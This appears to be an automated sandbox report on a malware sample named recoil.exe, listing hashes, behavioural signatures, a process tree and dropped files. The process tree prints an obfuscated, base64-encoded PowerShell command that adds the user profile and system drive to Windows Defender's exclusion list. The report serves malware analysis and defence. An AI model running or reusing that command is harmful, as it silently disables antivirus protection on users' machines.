Analysis

  • max time kernel
    148s
  • max time network
    18s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    28-10-2024 19:40

General

  • Target

    recoil.exe

  • Size

    14.9MB

  • MD5

    70ea3adb75835187756a48c740cf720c

  • SHA1

    4db1692b7964bee36d6263b86a00bbeee5d7e491

  • SHA256

    31757f7f9c2d5853f1dd12aff97844d8daebf2af0c806d92c006ccdb9b02126b

  • SHA512

    a386d10e5e91a8bf8176f9bc385a3ad072fc72fd2458729fb5c84d42b2cf453dc6e1a34e2d69796081a86845fe89638eea014dc65d682ff53acb8bdc28c1f261

  • SSDEEP

    393216:XwJhlgWrYmEmiJc2A11sYR1PmCt++iI3XR+:XwruWTitA11r1+I++iI3XR+

Malware Config

Signatures

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 10 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 37 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\recoil.exe
    "C:\Users\Admin\AppData\Local\Temp\recoil.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2104
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AYwBuACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGMAcQBlACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGcAZABuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAaQByACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2204
    • C:\Users\Admin\AppData\Local\Temp\Recoil App.exe
      "C:\Users\Admin\AppData\Local\Temp\Recoil App.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of SetWindowsHookEx
      PID:1620
    • C:\Users\Admin\AppData\Local\Temp\warden.exe
      "C:\Users\Admin\AppData\Local\Temp\warden.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2444
      • C:\Users\Admin\AppData\Local\Temp\warden.exe
        "C:\Users\Admin\AppData\Local\Temp\warden.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:2108

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\_MEI24442\api-ms-win-core-file-l1-2-0.dll

    Filesize

    21KB

    MD5

    4a060eec454c222a5381cd359dc00b81

    SHA1

    21e1bc115d04a74779e955ea16a16bd71454d9bb

    SHA256

    e6b2b05e14a6c6f5381e8f4c7f4fd28a499246fb4c8eafe1f08014b9273d70df

    SHA512

    16fb1f4ccdad05d07feb62e0cd078401f4023f9fab0fb15e52b927ca413e65eb32c2932ba59dbfa7f7ee0e8a8053748e27f2757e82e600db812271aa44a9433c

  • C:\Users\Admin\AppData\Local\Temp\_MEI24442\api-ms-win-core-file-l2-1-0.dll

    Filesize

    20KB

    MD5

    50abf0a7ee67f00f247bada185a7661c

    SHA1

    0cddac9ac4db3bf10a11d4b79085ef9cb3fb84a1

    SHA256

    f957a4c261506484b53534a9be8931c02ec1a349b3f431a858f8215cecfec3f7

    SHA512

    c2694bb5d103baff1264926a04d2f0fe156b8815a23c3748412a81cc307b71a9236a0e974b5549321014065e393d10228a0f0004df9ba677f03b5d244a64b528

  • C:\Users\Admin\AppData\Local\Temp\_MEI24442\api-ms-win-core-localization-l1-2-0.dll

    Filesize

    21KB

    MD5

    4c26932f8f1f490017add31f5ec0a533

    SHA1

    0da01a7c89b506fe3fd939344bb51b976efb3207

    SHA256

    dd3843c2e46b4e926c36150d614efe02ca0ebc1f767f64f471568adc35c2ef23

    SHA512

    eb2b87d187991fdc8e3a6577f20622d2d4a2a994dd375d8c27e1434ce786596533eacfbde8714db9959d88d6bcb91fdc8079c60c23f0eb920ba45c546a44e523

  • C:\Users\Admin\AppData\Local\Temp\_MEI24442\api-ms-win-core-processthreads-l1-1-1.dll

    Filesize

    21KB

    MD5

    a6776c201baae1dd6f88048d7747d14c

    SHA1

    646119d2e440e6dad0ffb0fe449ab4fc27f09fbe

    SHA256

    ee99af71c347ff53c4e15109cb597759e657a3e859d9530680eeea8bb0540112

    SHA512

    a9137af8529fd96dbba22c5179a16d112ec0bfab9792babe0a9f1cca27408eff73ba89f498cb5f941a5aa44555529ee10484e6ca4a3fbf1627523acfde622b45

  • C:\Users\Admin\AppData\Local\Temp\_MEI24442\python311.dll

    Filesize

    1.6MB

    MD5

    db09c9bbec6134db1766d369c339a0a1

    SHA1

    c156d9f2d0e80b4cf41794cd9b8b1e8a352e0a0b

    SHA256

    b1aac1e461174bbae952434e4dac092590d72b9832a04457c94bd9bb7ee8ad79

    SHA512

    653a7fff6a2b6bffb9ea2c0b72ddb83c9c53d555e798eea47101b0d932358180a01af2b9dab9c27723057439c1eaffb8d84b9b41f6f9cd1c3c934f1794104d45

  • C:\Users\Admin\AppData\Local\Temp\_MEI24442\ucrtbase.dll

    Filesize

    1.1MB

    MD5

    3b337c2d41069b0a1e43e30f891c3813

    SHA1

    ebee2827b5cb153cbbb51c9718da1549fa80fc5c

    SHA256

    c04daeba7e7c4b711d33993ab4c51a2e087f98f4211aea0dcb3a216656ba0ab7

    SHA512

    fdb3012a71221447b35757ed2bdca6ed1f8833b2f81d03aabebd2cd7780a33a9c3d816535d03c5c3edd5aaf11d91156842b380e2a63135e3c7f87193ad211499

  • \Users\Admin\AppData\Local\Temp\Recoil App.exe

    Filesize

    3.2MB

    MD5

    acf8907ce64638007fb5514265812c67

    SHA1

    daa5404df21afc0cbfc126b9544fa68f3833e3f8

    SHA256

    9fe5fb74600e204a4739a0ed262f16ab6c7eb9f970f61d6315a8e5010f9bc3d4

    SHA512

    aa7478af047621b9f6d828356a20905f46a520cf364bc639ff0c21b5e9ae8eb29d5edcb2dd00c4dc327ca5348868d754c7068aff132d27d21e606e3ff821f9b6

  • \Users\Admin\AppData\Local\Temp\_MEI24442\api-ms-win-core-timezone-l1-1-0.dll

    Filesize

    21KB

    MD5

    10d466341e7ece8cf75b5d026105741b

    SHA1

    31d1e9b9a4511156695b5aa33d65b6a36f8139c2

    SHA256

    5ce391edb33c7055e724a4c3cecc64d16ba2aa4724cb99cd5aed00b0cecfbc82

    SHA512

    8778fd10c7360bd87db048a2b2ca6603455fd8cb4d0e18709f106b55db7cc92e7d6dc45385ff9def445b368376462e7d253442728d5e759faa97299b67a59e21

  • \Users\Admin\AppData\Local\Temp\warden.exe

    Filesize

    11.7MB

    MD5

    066c85a9a0f70d780afc130fd6982dee

    SHA1

    09f20277c3776e23dccaa60e5fe6e9d35af4a6e6

    SHA256

    5416685eb0b64edd1e42fc96ee9365e0108f40889d4af3ee1a8598d1bfbaf02f

    SHA512

    4724721c07ac70ba90c949b86ce5d6e0f8f9a1b0a7c8ce801bb9b55f7cf377c2a7e84b84b84e0f72b29a413accec541c4a9d588ef39834b09975139d18227bfc

  • memory/1620-118-0x0000000003FE0000-0x0000000003FE2000-memory.dmp

    Filesize

    8KB

  • memory/1620-119-0x0000000000100000-0x0000000000452000-memory.dmp

    Filesize

    3.3MB

  • memory/1620-199-0x0000000000100000-0x0000000000452000-memory.dmp

    Filesize

    3.3MB

  • memory/2108-116-0x000007FEF6580000-0x000007FEF6B68000-memory.dmp

    Filesize

    5.9MB